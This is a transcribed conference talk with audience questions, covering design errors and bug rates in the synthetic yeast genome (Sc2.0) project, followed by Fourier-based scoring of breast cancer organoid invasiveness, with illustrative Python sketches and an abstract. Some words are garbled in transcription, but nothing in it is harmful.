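To make the synonymous-recoding idea concrete, here is a minimal sketch, not the actual Sc2.0 design software, of how a restriction site can be removed from an in-frame coding sequence without changing the encoded protein. The BamHI site GGATCC, the deliberately truncated codon table, and the function name are illustrative assumptions only.

```python
# Illustrative sketch only (not the actual Sc2.0 design code): synonymous
# recoding to remove a restriction site (here BamHI, GGATCC, as an example)
# from an in-frame coding sequence without changing the encoded protein.

CODON_TABLE = {
    # deliberately truncated table, just enough for the demo below
    "GGA": "G", "GGT": "G", "GGC": "G", "GGG": "G",
    "TCC": "S", "TCT": "S", "TCA": "S", "TCG": "S", "AGC": "S", "AGT": "S",
}

SYNONYMS = {}
for codon, aa in CODON_TABLE.items():
    SYNONYMS.setdefault(aa, []).append(codon)

def remove_site(cds, site="GGATCC"):
    """Return cds with every occurrence of `site` removed by synonymous swaps."""
    codons = [cds[i:i + 3] for i in range(0, len(cds), 3)]
    seq = "".join(codons)
    while site in seq:
        first = seq.index(site) // 3              # first codon touching the site
        last = min(first + 3, len(codons))        # a 6-bp site spans at most 3 codons
        for idx in range(first, last):
            aa = CODON_TABLE.get(codons[idx])
            if aa is None:
                continue
            # try every synonymous codon until the site disappears
            for alt in SYNONYMS[aa]:
                trial = codons[:idx] + [alt] + codons[idx + 1:]
                if site not in "".join(trial):
                    codons = trial
                    break
            else:
                continue   # no synonym at this codon removed the site; try the next codon
            break          # site removed; re-scan the whole sequence
        else:
            raise ValueError("could not recode around the site")
        seq = "".join(codons)
    return seq

# "GGATCC" codes for Gly-Ser and contains the site across the codon junction;
# after recoding it becomes "GGTTCC", still Gly-Ser but without the site.
print(remove_site("GGATCC"))
```

On this toy input the site disappears while the Gly-Ser peptide is unchanged; the real design has to do this genome-wide, quickly, and while respecting the other constraints mentioned above.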
So this is actually one of the regions where reasons, this is one of the areas where we had to actually pull out some algorithmic work and make this run fast enough to be able to solve the optimal, the constraint problem to be able to get these to be unique in the genome. All right, so new capabilities we've done TAG TAA recoding so that eventually we might be able to introduce a 21st amino acid into the genic code and we've put in LOXP sim sites so these are symmetric versions of LOXP sites that when Cree recombinases around permit recombinations in the genome to give inversions transpositions deletions and all together there's about one million base pairs difference between the DNA we designed and the wild type genome as well as this additional chromosome. Why is the 21st amino acid? Why did you put the 21st amino acid? Oh, so this is getting rid of the TAG codon so then we can put in a TAG codon and have it and then introduce a tRNA synthetically coupled with an unnatural amino acid and then have an additional functionality in the protein code. So there are like more wilder science fiction-y type things to try to get all that apparatus working inside a cell and Farron Isaacs has done similar work to get E. coli that have been recoded to free up codons. Why would you remove the introns? Why would you remove the introns? So it turns out we can't remove all the introns. We thought we could but some give fitness defects. We moved most of these genes don't have introns and we thought it would be cool to get rid of the ones that are there. Because they seem to be sometimes clustered in important genes, right? So there's been other work and I don't remember the name of the group that did a project to systematically delete introns. Some introns you can't delete but not because of the intron itself. It's because there's a non-coding gene in the intron and if you, so at least, so this is my, I'd have to go back and check my notes but that if you move that non-coding gene somewhere else then it's fine. So I'm, so I'm, don't hold me to that, that sort of, but there are other introns that people have deleted and a couple of them. I think they're five or six that when you delete the intron you get a fitness defect. Most introns you don't get a fitness defect when you delete. Part of the idea about deleting the introns was seeing whether some of the splicing apparatus then became non-essential. You know, is it just there for splicing of introns and predicting coding genes or does it have other functions? So that was the general idea. This is, so I'm not really going to talk about the scramble experiments so I'll. So the, so yeah, so on the computer we take the sequence, we break it down to smaller and smaller pieces. Eventually they get ordered. So they get ordered, then we receive them. At Johns Hopkins for a while we had a factory running with undergraduate labor taking the oligos received at that point from IDT and then doing PCR reactions to build them across to 600 more pieces and then build them up in succeeding stages of assembly. So these, these undergrads completed the synthesis of chromosome three published in 2014. So that, that was, that was really exciting. But the course is over now because all the DNA has been synthesized. So it was fun while it lasted. So here's a picture of what the design looks like if you want to make a figure for a paper. So these are different parts of chromosomes and these arrow things are protein coding genes, the green bands are the PCR tags we put in. 
The green diamonds are the LOXP, SIM recombination sites. The red is an essential gene. These purplish are autotrophic, oxotrophic markers and, and so there you have the design. So, but we made some mistakes. So it is, it is a challenge to do all of this design and, and so yeah, so mistakes were made and I guess really they'd be my fault because my group did the computational design. So there are a lot of problems. So one is we don't really have any good models that map from sequence to fitness. So we just heard a talk trying to build up regression models that say here are the variants and here's the fitness. So those are still, you can't really do that. Also trying to identify hyphenous sequences that obey synthesis and assembly constraints so those algorithms didn't really exist. We weren't, you know, sure exactly whether what we implemented was going to work well. Also the, the execution, just putting all of this together in a production pipeline. So when the human genome sequencing project started, there were lots and lots of groups writing software to first, you know, look at gel images and get DNA sequences and then do all this assembly and, you know, sequence validation and instead it was a couple people in my lab doing all of the design and then risk benefit. So this to me is the most interesting that in talking through the design choices, so we just heard like why get rid of all the introns and so like one answer is like, you know, why not? But there are other changes that we were thinking about making that, you know, we weren't sure, you know, pushing sort of the design goal of being able to test wilder things you can do with the genome versus worrying that we'll get dead cells out and won't have a way to figure out how to get them back healthy. So we wanted to, yes. You didn't mention the ribosomal RNA. You would use the corpus, right? The number? I don't know. I don't think we really reduced the ribosomal arrays. That's my question was probably she could work it, but use the number of this and make it a smaller chromosome. So I'll get to this later, but I'll answer it now. Actually one of the fitness defects that we get with the tRNAs is that we don't have enough tRNAs in the cell because we're deleting them, but often we haven't added back the tRNA neochromosome. No, I'm talking about the ribosomal. No, no, no. So what we see is upregulation of the ribosomal, of ribosome components to make up, to compensate for the depletion of tRNAs because we don't have as many copies of the tRNAs as we're supposed to have. So if we further reduced the ribosomal arrays, I think we'd have even reduced fitness. So we haven't been reducing the ribosomal arrays. I don't think we'd want to reduce the ribosomal arrays. Definitely not until we have the tRNA in. And then that would be sort of, I think that would be a reasonable thing to try, but for now we're not reducing the ribosomal arrays. So how many copies do you have? Maybe we will move this question. No, this is a quick question. Okay. But the quick. We have as many as there are on the well type. So we want to end up with a beautiful well functioning classic yeast cell, but maybe like what we're going to make is more like the Bobor. So there you go. So all right. So here we go. So what mistakes were made? And if we knew then what we do now, what would we have done differently? So if present day me went back to like 2007, 2008, there are lots of mistakes that I wouldn't make, but in terms of yeast design, what would the difference have been? 
So here's this first point. So about the ribosomal RNAs. So we actually made one blunder and it was not my fault because Giovanni warned Jeff about it that there's a single copy tRNA that we, like Giovanni said is a single copy. Are you sure we should delete it? And we deleted it. And then there was a fitness defect and we had to add it back. So we told them that we thought it'd be a problem and got deleted anyway. Fitness defect. So that was a blunder. And so as I mentioned, the tRNA copy number variation that we transiently have reduced copy number ends up with ribosomes compensating the opposite direction. So if you look at those 2017 papers, each yeast strain that has a synthetic chromosome has mRNA seek done. And pretty much the only significant differences are that ribosomal genes are over expressed. All right. So now here is actually a real systematic problem that we had. So I mentioned that we replaced the telomeres with a universal cap. And what we found is that, so the telomere is silenced and then there's an insulator that keeps the silencing from going into the sub-telomere and then into the regular chromosome. And what is happening in the synthetic chromosomes is that the silencing is extending further than it should. So that's happening for two reasons. One is that probably our silencing sequence in the telomere cap was not sufficient. The other is that since we got rid of a lot of the sub-telomere junk, or I guess, you know, maybe it's not junk, we got rid of a lot of the sub-telomere pseudogenes. And they sort of were a buffer in the wild type chromosome that if silencing extends into the pseudogenes, that's okay, but since we got rid of that, then it's easier for the silencing to extend into the real protein coding genes that are used. So probably what's going to have to happen is systematically replacing the so-called universal telomere cap with a new and improved universal telomere cap. So that's on the way. So another problem that we have, oh, does someone just, no, is that, so these loxp-sim sequences that we put in for recombination, so they're completely stable once things are integrated in the chromosome. But the problem is that one of the steps for integration and assembly is homologous recombination, of putting in synthetic DNA, and it's supposed to, you know, land where it's supposed to land and get rid of the wild type DNA. But the loxp-simsites can seed homologous recombination, and then what we get is sort of a misassembly. And these are easy to catch, but the problem is that we didn't put catching them into our workflow until they got sort of further along, so we didn't catch them as quickly as we should. So this isn't really something that we could have fixed because just having the loxp-simsites in there causes this to happen, and we wanted them in there. So it's more that our process just should be improved to look for offsite homologous recombination. It turns out, however, that there are two problems with the loxp-simsites that we found where we put them, so loxp-simsites were inserted into the 3-prime UTR of every non-essential gene, so there are about 1,000 inserted to date, and two of them affect the promoter of a neighboring gene through a mechanism that we're not really sure of, except that we know it's because we put the loxp-simsite there, because when we take it out, then the problem goes away. So it's unclear how to predict these, so unfortunately knowing this, it wouldn't really have changed how we did the design back then. 
But would it change the way that you go forward? No, because we've tried and tried and tried, but we haven't found any good way to predict why it is that out of these 1,002 of them have this effect. So there's nothing. So what's the effect? Oh, the effect is that I think it is the fitness defect due to down-regulation of the neighboring gene. So it's transcriptional. You pick it up on the profile? So we pick it up two ways. We pick it up one way that we see the cell as a fitness defect. We pick it up seeing that the transcript is expressed below the level it's supposed to be, and then we cure it by getting rid of the loxp-simsite, and that was when we decided that was enough work done on the project. So yeah. Did you correct the... Yes, yeah, yeah, because these fitness defects, they're not big. Do I mean the mutant genes, like half one that are in the reference train, did you correct those as you went along? Oh, the mutant genes that are in the reference train. There's a bear, you know, there's a dozen or something, and it... I'll have to ask Jeff. That's a good question. No one's ever asked me that before. I never thought about it. They make a huge difference to the fitness of... So the reference train is a mutant. So we're not... So this isn't based on the reference. I think this is based on a BY? Yeah, that's what I'm talking about. BY4741? Yeah. I'll have to ask Jeff. Okay. I should make a note of that. Yes, very helpful, but we need to... I'll still bring it home by 4, don't worry. All right. So synonymous recoding. So here again, so these are the watermarks we put in. So we put in... So we recoded 60KB synonymously. And out of the 60KB, so 60,000 bases, three of them cause problems. One, it's completely unclear to us still why it causes a problem. And another, we create a stem loop in the PRE4, P-R-E4, mRNA. So possibly we could have avoided it, but if we worried about every stem loop, we would have made... I don't know if it would have been worth the trouble. And then here, this is a real one that probably we maybe should have been smarter about. We created a RAP1P binding site in a transcript, which causes the transcript to be repressed. So possibly we should have screened more for creating RAP1P binding sites. So go... So do you put the watermarks inside coding regions? Oh, yeah. That's the only place we put them. Because we don't know anything about gene regulation. All we know about is the genetic code and that if we have the same codons, we'll get the same protein. We try to avoid putting PCR tags into the very five prime region of a gene because there's lots of evidence that that codon selection is chosen to melt structure and make it easier for the ribosome to have an on-ramp or whatever people say. So we just... We try to avoid that. Otherwise, we just go wild on the protein coding region. So going forward, maybe we're going to incorporate these in the next design. But looking backward, there's a trade-off between experimental and computational effort. And probably it ended up being more efficient just to do what we did. And then have the wet lab people fix the couple bugs that's sneaked through. So I say that as the computational person. So our total bug count, WaxP SimSites, a thousand added two bugs, PCR tags, 60 kb of tags, three bugs, stop codons. So no fitness defects in the stop codons. Synonymous coding, 5,000 bases, no bugs. TRNA deletions, no unexpected bugs. And then repeat deletions I didn't even mention. 
So far, no fitness defects from getting rid of any of the repeats. So to me what this means is we should have been more aggressive in our design. That synonymous coding has 5 times 10 to the minus fifth bug rate. So the design choice that I was pushing for, that Jeff said no to, was to pick some of the other low-frequency codons. So low relative synonymous codon usage. And get rid of them also. So typical low-frequency codon, fewer than 10% of the codons for that amino acid use that codon. So 30,000 to 70,000 occurrences of low-frequency codons. So for each of these amino acids that we recoded, we would have maybe introduced three to five fitness defects genome-wide that I'm sure we could have gotten back. Yes? Why is not a sharp number? Why what? Why you have a range of occurrences? Oh, because it depends on the amino acid. So you have to multiply the RSCU by the number of amino acid occurrences of that amino acid to get the number of occurrences of that codon. And they're also about 10%. So I'm not telling you what codon it is or what amino acid it is. It's just like, that's sort of the typical range for low. There are like three or four of them, maybe five of them in the genome, in the yeast genome. So something that really shocked me is how few execution errors we had in terms of getting an email from Jeff that we have to spend money on nucleotides by the end of the month and we need to quickly get this water done and a lot of code that was written once and run once and then never touched again, that actually like very low human error rate, much lower than I would have expected. Annotation errors. So something that caught us at the very end when we were trying to get papers submitted is that we tried to upload our synthetic genome sequence and annotations to GenBank and it got rejected. And it didn't get rejected because of anything we had added. It got rejected because of the legacy annotations from the original yeast genome annotation that in between when that first genome sequence was submitted and when we did this, GenBank improved its syntax checker and then rejected something that had, you know, some of the reference stuff that it had accepted before. So probably we should have been using the GenBank table to ASN checker. So that wasn't really our mistake but it's like one of these things. So as Charlie mentioned that I wasn't aware of that, you know, the mutations in the reference sequence, like here's a mutation in the reference annotation that we had to fix. So we haven't fixed the sequence maybe but we have fixed the annotation. All right. So challenges in genome design. So for mammalian, so now there are a lot of people interested in doing similar projects in mammalian. And so we're interested in that also but mammalian is much more challenging for a lot of reasons. My only insight based on yeast is that I wouldn't, you know, I wouldn't worry after designing all these yeast chromosomes and, you know, seeing how well they worked, I wouldn't really stress out too much about getting the design perfect. I think it's better just to sort of start and see what works. All right. Yes. What I understand is you clean up a little bit the yeast sequences. I don't understand where is the new stuff. What new stuff? Well, what you did is you took the natural sequence. 
Oh, the stuff I'm not talking about is the loxopiesome sites and having the chromosomes programmed to rearrange in different environments and explore diversity space by generating lots and lots of very closely related genomes that then wander around in genome space. Yes, I'm not talking about that. And if you would put this new yeast in a natural environment, would they out compete? Well, I'm not sure they would really have so much fitness defects compared to regular yeast. The value is that it's very fast evolving in terms of copy number. So it's, so they're very useful to evolve pathways. So or live in stress conditions that you turn on this recombination system and then it will increase copy number of things that should be increased quickly. It will decrease and it will be locked into the genome. So it's been very useful for that. More important, can you still bake with it? So the answer is yes, but the IRB won't let us eat the bread. One of the projects of our, so like there are groups that have, schools have iGEM teams to do synthetic biology. So one of our teams put beta-carotene synthesis into yeast to have yeast that was going to be enriched for, so carotene starts with a C, but unfortunately it's vitamin A. So that they're enriched. And when you grow the bread, well when you bake the bread it smells a little like carrots, but the IRB told us specifically no tasting the bread. It's got DNA in it. When you measure fitness it's in a specific environment. Yes. So usually we're talking about fitness and, well fitness was measured at like three or four standard environments, like regular temperature, I think higher temperature to look for higher temperature fitness defects, a couple other fitness, but you know we didn't probe it over a ton of fitness conditions. How long have they been grown? Ah, since, so different, so different strength, like I think we got our first chromosome, the first full chromosome was 2014 maybe. So are they evolving? No, no, no, I mean no, they have the same mutation rate as a regular cell, which is like one, usually it's like one mutation per generation. They're not really, you know, they're not, and the Loxpea Sim sites are completely stable in the absence of Cree expression. There's nothing, like they're no more, they're no less, well they're no less, they seem no less stable in the wild type yeast and hopefully they're more stable because of the tyrannone chromosome, hopefully. All right, so thanks to funding NIH DARPA NSF on Erison Bio. And now I want to tell you in the 15 minutes, is it really 15 minutes? Because I started late. And there are some questions. You have a little bit more, yes. All right, I want to... But still we think about one hour this question. Oh, yes. So together this... That's right. Yes. So about 15 minutes it's okay. All right, I just want to show some math slides. So I did not know before I started working on this, so this is a cancer project. I did not know before working on this project that for breast cancer it's not the tumor that kills people, it's the metastasis. And that therapies to get rid of the primary tumor are not really effective at all if the tumor is already spread. So five-year survival for local or regional breast cancer is very good, but metastatic cancer, once it's spread, is only 26 percent. This is very difficult to study. So here's sort of a picture of what metastasis means is that there's a group of cells in a tumor and the cells are colored suggestively to show different cell fates in a tumor. 
So the same way that normal cells in the body have different cell fates, there's sort of a growing theme in cancer biology that different tumor cells have different fates that may have to do more with changes in, you know, epigenics and transcription factor circuits as opposed to somatic mutations. So the same way that we have different cell fates in our normal cells because of cell fates choice, there seems to be similar cell fates choice in tumors. Part of it might also be differences in somatic mutations, an open question. So here colored suggestively are the blue cells that sort of lead an invasion and then the red cells that are more proliferative that follow along and then they see it a secondary site and then the more proliferative cells sort of outgrow and the more invasive cells are still there. So that's the type of picture. So some evidence for this, Andy and I published recently using different protein markers. Yes. I just want to point out that K14 may be required for the dissemination but it's not required. It's actually disappeared after the tumor in the secondary site. Yes. So that's what this picture is supposed to show that exactly that. That these are colored blue and his experiments are expressing K14. That clusters circulating tumor cell clusters look like they're mixtures of K14 expressing K14 non-expressing and then as it grows out, we see the outgrowth of the non-K14 expressing. With still some K14 expressing but it goes and it's not clear whether it's this cell outgrowing or whether there's sort of a switching between different lights. I think that's a very interesting question. So metastasis has been challenging to study in vivo for a lot of reasons. You can, oh, but with recent funding, we're really excited about studying it in organoid systems. So particularly I should thank the NIH Office of Cancer Genomics, the Cancer Target Discovery and Development Program and then seed funding from Ted Giovannis Foundation and then Breast Cancer Research Foundation and some supplements and seed funding we had. So here's my experimental partner Andy Ewald who's in cell biology and oncology. He'll be recruiting 25 breast cancer patients a year for the next five years working with the director of breast surgery who consents the patients on the way in and the pathologist who hands off the samples to us, Edward and Ashley. And then the most important thing about the trainees working on this are that in blue is every French connection. So Andre of postdoc in my lab trained at University of Pierre-Marie Curie, Parisis, LOD and Eloise have just joined the group from Bordeaux and from Nice. And then Hildre and Matthew, they're not from France but they're from the next best place Canada. So that's the team. And the method that we're using is organoids which are just these, so this intriguing model that is very complementary to doing in vivo work in an animal model versus doing cell line work say with human cells. It's very nice, it's a human model. It is clumps of cells grown in a 3D matrix that then behave like many organs. So here's a picture of a mouse organoid prep of taking the mouse mammary gland and then these are 300 to 500 cells, so that sort of size. So in a normal individual for breast tissue they self-organize into what looks like a mini milk duct with a luminal layer and a basal layer. And if you look at them under a microscope from normal tissue they just sort of sit like that and don't do much. 
So what got me so interested in this project is looking at these movies of organoids invading. This is an assay where this group of cells is put into 3D media and it starts to invade, and it's just striking really. It caught my interest because I had never really thought about this; I always thought about cancer as cell division, not about this. So I really wanted to understand this phenotype, and for me understanding the phenotype means I'd like to put a number on it. That makes it easier for me to do any sort of statistics. And up to now, really, the numbers have been someone looking under a microscope and saying, oh, that's non-invasive, that's a plus, a plus-plus, a plus-plus-plus. So I wanted to do something more quantitative. I've looked at, I don't know, probably several thousand organoid pictures. You see different patterns with your eye, and I'll show some of the patterns later on. But looking at the patterns, it just seems like if we could use machine vision and machine learning methods to do clustering of the patterns, then different patterns probably correspond to different types of pathways being activated, and then we can dissect different things that are going on. Looking at these thousands of pictures I could sort of see patterns, but I wouldn't really trust myself to put things into groups. And if we had a quantitative set of features to say, here in numbers is what this sort of picture looks like, then we could roll out all the tools of machine learning, statistical analysis, and whatever other word of the moment we want, like deep learning. We could use deep learning on it. All right, so the quick math interlude is what we're doing to characterize the shapes quantitatively. This is sort of washed out, but imagine, if you would, a smooth contour for an organoid. If you put a point in the center and then trace the radius as a function of the angle, you get something that's almost constant; if it were a circle it would be constant. And it's periodic, because if you go around more it repeats, so that means you have to Fourier transform it. If you Fourier transform that, you'll get, if it were completely flat, only a zero-frequency component; if it's a more complex shape, you get something more complex. If it's really complex, you don't get a function anymore, because for a really complex shape the ray from the center can intersect the boundary at multiple points. So instead the trick is to make a parametric curve of the x and y components separately, as a function of the contour length. I was really excited when I found that with Keynote you can use LaTeX, but for the mathematicians here this is baby math. Anyway, what we do is this: Vina, Andy's high-energy, really patient graduate student, spends hours tracing the organoid boundaries, because segmenting the organoids is a pretty hard problem for us, and I don't have to solve that problem because we have Vina.
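A minimal sketch of this kind of parametric Fourier boundary descriptor, not the actual analysis code: the traced boundary inputs, the resampling density, and the plain k-squared weighting (a stand-in for the cosine and sine filtering described in the steps that follow) are all illustrative assumptions.

```python
# Illustrative sketch only (not the actual analysis pipeline): a parametric
# Fourier descriptor that scores how "wiggly" a traced organoid boundary is.
import numpy as np

def invasiveness_score(boundary_xy, n_points=256):
    """boundary_xy: (N, 2) array of traced (x, y) points along a closed contour."""
    pts = np.asarray(boundary_xy, dtype=float)

    # Resample the closed contour to n_points equally spaced in arc length,
    # so Fourier modes are comparable between organoids.
    closed = np.vstack([pts, pts[:1]])
    seg = np.linalg.norm(np.diff(closed, axis=0), axis=1)
    arc = np.concatenate([[0.0], np.cumsum(seg)])
    s = np.linspace(0.0, arc[-1], n_points, endpoint=False)
    x = np.interp(s, arc, closed[:, 0])
    y = np.interp(s, arc, closed[:, 1])

    # Parametric Fourier transform of x(s) + i*y(s); the zero-frequency term
    # is just the center of mass, so drop it.
    coeffs = np.fft.fft(x + 1j * y) / n_points
    coeffs[0] = 0.0

    # Normalize by the dominant first harmonic so the score does not change
    # with the zoom level of the microscope image.
    coeffs = coeffs / max(abs(coeffs[1]), abs(coeffs[-1]))

    # Weight higher modes by k^2 (a curvature-like emphasis standing in for the
    # cosine/sine filters) and sum the spectral power beyond the fundamental.
    k = np.fft.fftfreq(n_points, d=1.0 / n_points)   # integer mode numbers
    power = (np.abs(coeffs) ** 2) * (k ** 2)
    power[[0, 1, -1]] = 0.0
    return float(power.sum())

# A near-circle scores close to zero; a wiggly, invasive-looking boundary
# scores much higher.
theta = np.linspace(0, 2 * np.pi, 400, endpoint=False)
circle = np.c_[np.cos(theta), np.sin(theta)]
spiky = np.c_[(1 + 0.3 * np.cos(9 * theta)) * np.cos(theta),
              (1 + 0.3 * np.cos(9 * theta)) * np.sin(theta)]
print(invasiveness_score(circle), invasiveness_score(spiky))
```

On these toy boundaries the near-circle scores close to zero while the wiggly shape scores orders of magnitude higher, which is the kind of ranking behavior described next.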
So she traces them and then I take those points I interpolate them I do Fourier transforms the zero frequency component of the transform is just a center of mass so I ignore that and then we get these images so then sort of in light blue you can see that's a round shape in real space and then in Fourier space that's pretty much just a flat line no spectral power and then here's a real organoid boundary that looks like a spaghetti monster and then when you transform it you get higher frequency components. So we do other steps we normalize it so what that means is if you zoom in or out then the Fourier components change with the zoom level by a constant scale and we don't want to say something's more invasive just because we had a like a higher number on the microscope so we scale out the size by normalizing to the first Fourier component and then we do a smoothing operation so when I was a graduate student I used cosine filters all the time but I never knew where they came from until when I worked on this project where so what happens is that if you have like a zoomed in picture of something you see pixelation and then if you trace a boundary with pixelation you don't get a smooth boundary you get like a jagged staircase so you can fix that by remapping all the points to the center of each segment so then if you had a staircase then you get a 45 degree angle ramp so that's the smoothing operation and that in Fourier space gives you a cosine filter so we throw on a we slap on a cosine filter and then so something else you can think about so mapping the two points to the center of the segment that's an average and sort of the opposite of taking an average is taking the difference between the two so if you take the difference it's like a local derivative and it turns out in parametric space if you take the difference it ends up giving you the curvature so we essentially weight the Fourier modes by a factor of k squared but if you do it right discreetly it's a sine filter so we throw on a cosine filter and a sine filter get a weighted spectral power and now if you give me the image of an organoid I can tell you with a number how invasive it is which is exciting for me because then that means that I can do all the sorts of work that people have done for complex traits so all the classic statistical genetics that people have done now we can do for this phenotype and people always talk about tumor heterogeneity and so here we're actually characterizing it so this is just like population genetics except that instead of looking at heterogeneity of different individuals in a population we're looking at heterogeneity of like different little groups of cells within a tumor so I'm so excited so here are the results from 800 organoids from 52 different tumors grown for 6 days and I learned how to so when we only had seed funding it was me and my python interpreter doing all the work so I learned how to like put together these thumbnail pictures so I'm very proud of figuring out how to do that so each of these little blocks is a different organoid in false color because if you give python black and white it says oh you gave me black and white but color is much prettier so it doesn't in color but if you give it a color image where you have all three color planes and they're the same it gives you grayscale so that was very confusing for me for a little bit that all of my grayscale images were coming out in color and all my color images were coming out in grayscale but I figured it out alright so here what 
I'm doing is these are the so each of these columns are organoids generated from a different person's tumor so there should be 52 columns one for each tumor and what I've done is I've stacked them from least invasive to most invasive and if you got up closer I think you would see that you would agree with for the most part with the way that my algorithm ranks them that at the top they look more invasive at the bottom they look less invasive and then this is just a false color scale so within each tumor we're seeing heterogeneity so we have within tumor heterogeneity that in a given tumor some organoids generated are less invasive some are more invasive and then what we'd want to do eventually is to take these organoids from a single individual and say what's different between these less invasive and more invasive organoids let's characterize them by RNA seek look at gene expression differences you know maybe we'll do whole genome exome sequencing to see if there are somatic mutations that make them different I'm not so convinced also we have between tumor heterogeneity so what I've done is I've essentially is the geometric average because that seems to like give a little nicer ranking for overall less invasive on the whole so this individual's tumors organoids are less invasive these are more invasive what we want to do eventually is to see if these correlate with patient outcomes breast cancer survival even even though on the whole it's bad still from primary tumor removal it's five or ten years to get good endpoints so we're going to be doing those correlations to see if the organoids are proxy for survival but those outcomes won't be for five to ten years also I can't guarantee that this study is powered to do that but we're thinking about other studies that would be more powered that are the question only our biologists you take a red spot yeah you saw I mean you disperse ourselves and restart the organoid do they repeat the phenotype did they repeat the phenotype well so what we're doing for that is is where's so so the so the phenotypes are not I'm sorry the organoids are not highly proliferative so they're not it's sort of there might be one or two cell divisions in this in the six days at most so it so we don't really have experiments like that up and running however we have mass genetic models where the phenotypes from one mass genetic model to the other are very reproducible so this point and you're sampling different bits of tissue yeah what they are doing here for a trogeny of the tumor you're taking different part of the tumor and get organoid that behave differently yes but I think that every organoid has a trogeny in itself yes you will be able if you do single cell on this organoid you will be able to identify the population of cells within the organoid that metastas I agree that is in the plan the problem is so I was talking to I think the person who spoke earlier in this session about the C. 
elegans single cell stuff is if we do single cell mapping back from the single cell sequence results to geographically spatially where it came from in the organoid so what we're doing as a start is we've got plans to laser capture micro dissection so you can actually eventually and reach for these cells the metastas and put them back into organoid or put them back into a new demise for example so we're so I think we have like experiments like that planned but we should probably talk after that we did that in the mouse and it's amazing you can see clearly what population is the metastasizing population of cells so we want to so I want to I would I'm really interested in circulating tumor cells so that I think like that is probably where we're gonna one of the directions we want to go is empty markers for example yes or not or not right empty the one that metastasize you will find proteases that induce so what what subtypes of this you say that no I didn't say what cancer subtypes they are because I'm not you use all the yeah we're just doesn't matter triple negative I'm not very different yes you're different I understand that I said these these experiments were done with pilot funds where we were sort of taking tumors on the way in now that we have real funding we can do it more systematically invasiveness is not a surrogate from metastasis I agree cause you know us are invasive by definition that's what makes a carcinoma different from an adenoma adenoma forms an organoid that is completely spherical and adenoma is defined as a noninvasive tumor cause you know us are invasive but most cause you know us are not necessarily metastatic and in breast cancer you can have metastasis occurring 20 years after treatment which is due to dormancy and there's no evidence that the metastasis originates from the circulating tumor cells a lot of it is totally hypothetical so I'm you can address that okay you can take I'm the math guy you can address that easily actually you can address that easily if you find an organoid that invades you can put it back into nutmite and then you will see if they metastasize it a mouse doesn't mean the metastasis is the best you can do if you've done we can just continue this discussion or otherwise maybe we will now let him talk so you have like three minutes to show you your talk and then yeah I will show like this and then one fun slide all right so here so I completely so I agree invasion is not metastasis they're also in dissemination so like we can't get metastasis in 3d culture instead the closer phenotype might be might be dissemination also Andy is working on entravization phenotypes where it's a co-culture with epithelial cells that are you know that look like a like a blood cell and seeing the tumor cells squeeze in so that's like that's that's his work that's going on what since since we mentioned k14 earlier what we're starting to do is a standard population genics type tests to do within tumor between tumor tests of association so here so here you're actually are phenotypes of of invasion without dissemination either as a single column or a collective invasion here actually is more dissemination without invasion so this is a I think this is the I forget exactly that says C3 one tag where individual cells are pulling off and so this sort of this sort of organoid actually has a very round boundary not invasive looking but it's like water molecules boiling off of a water droplet as the individual cells crawl off but what's constant in all of these is that the 
leading cells are expressing k14 possibly pulling themselves to the matrix and so we so we actually have the so Andy stain for k14 because he's so interested and then we did regression tests of k14 versus our invasive phenotype and so here's a correlation for an individual tumor measuring the difference in k14 versus baseline and difference in invasion versus baseline and a strong correlation p value of 10 to the minus 42 so so what we want to do now is do this genomically for you know transcripts proteins and also do things that are sort of really more tied to the biology all right yes I think the k14 is true only for the PR negative I'm I think we should so I have to go to see whether we actually are consented to look at the ER status of the organoids that we've done so far I think I mean we're consented for some things but not for a lot and actually one of the things that I have to be working on is our IRB all right two more slides two more slides so first so thank you so I want to show some of the family's French connections so this was our this was my wife's dog actually before we got married but then the dog adopted me born in France so so there's my family so thanks to my family for letting me come here so my wife had has a matrice from Patel in Sirban admitted to the French bar so Ezra was born in the 17 so these two kids are being brought up Francophone my daughter's favorite food is ponch chocolate and this is this dog a three-quarter French poodle and that's our new puppy Ophily so there sort of washed out so she's only three-quarters she's a Labradoodle so she's one-quarter Labradors three-quarters yeah and there we go all right so thank you and they let me travel anyway so metastasis extremely important difficult problem as a math guy it seems to me that working backward from the genetics of them and then all the metastasis is the better approach because they're easy know that some part of the genetics of the metastatic tissue is reflecting the process of metastasis maybe only a small part but so there are two problems with that one is if say say that there's EMT then with EMT comes MET so the back transition and so what if what you're looking for is actually a transient that is only expressed by the cells as they're mishastocizing but then when they regrow either you lose that cell type because it's a small cell population or you lose it because there's an MET transition so looking at the metastasis might not be very helpful your argument is fair but looking before metastasis essentially opens you up to any possible so that's why I'm so excited about methods to look at cells as they're traveling through the body however there's also a very low success rate for circulating tumor cells for reseeding so it's like if we're an easy problem it wouldn't be open to work on. I have a question. Well the biggest problem is actually a tactical problem because when patients die from metastatic tumors they hardly do any resection of metastatic tumors so what's available in the lab for people like you and me. So we have so yes and no we have a great program like that at Johns Hopkins and pancreatic where in pancreatic they at least my understanding because that they take out anything else that they find like as autopsy. Ralph Rubin he mostly has primary tumors because when patients die from metastasis there are very few places that actually pay for the autopsy and you have to do special program worn by the autopsy to really excise the metastatic. 
So we have a program like that in pancreatic. The problem in pancreas is that by the time 90% of the patients are diagnosed they already have metastasis so and we still don't know what's the genetic difference between metastatic and non-metastatic tumors. Despite so many years of research and so many cancer genomes have been sequenced we still don't know that. Yes I'm so surprised like I always thought oh there's this wealth of data but almost all of it is primary tumor and also the sample numbers my picture was oh these days everybody who has cancer diagnosis gets their tumor sequenced and the answer is no and maybe they'll run a foundation panel of 50 or 100 and even that ends up really not being so helpful for therapy choice and so it's really so that's why I have to get hard to work on our IRB to be able to and also usually the consent doesn't allow follow up so it's not as far along as I had imagined when I started. Now by the time somebody is dead there's nobody to send the consent for. Okay if you don't have other questions we will thank again our speaker.
|
Computational design of DNA sequences with defined function is a goal of synthetic biology, but we still lack crucial information required to construct objective functions reflecting reality. Thus, much work in synthetic biology still relies on synthesize-and-screen rather than design-and-build. Because of known unknowns and unknown unknowns, design challenges at the genome level require tradeoffs between the benefits of more ambitious designs and the risks of fatal flaws. The complete synthesis of the yeast genome by the international Saccharomyces cerevisiae (Sc2.0) consortium has reached a milestone of 3.5 MB out of 12 MB finished in the form of entire synthetic chromosomes replacing their wild-type cognates, which in turn provides a first opportunity to characterize design flaws. We provide an overview of our mistakes, including both systematic errors and random failures, and discuss how we would have revised the design had we known then what we know now. A general conclusion is that our bug rate was very low, about 5x10^-5 in fitness defects per bp changed in protein-coding regions, and that our design was much more robust than we had anticipated.
|
10.5446/50891 (DOI)
|
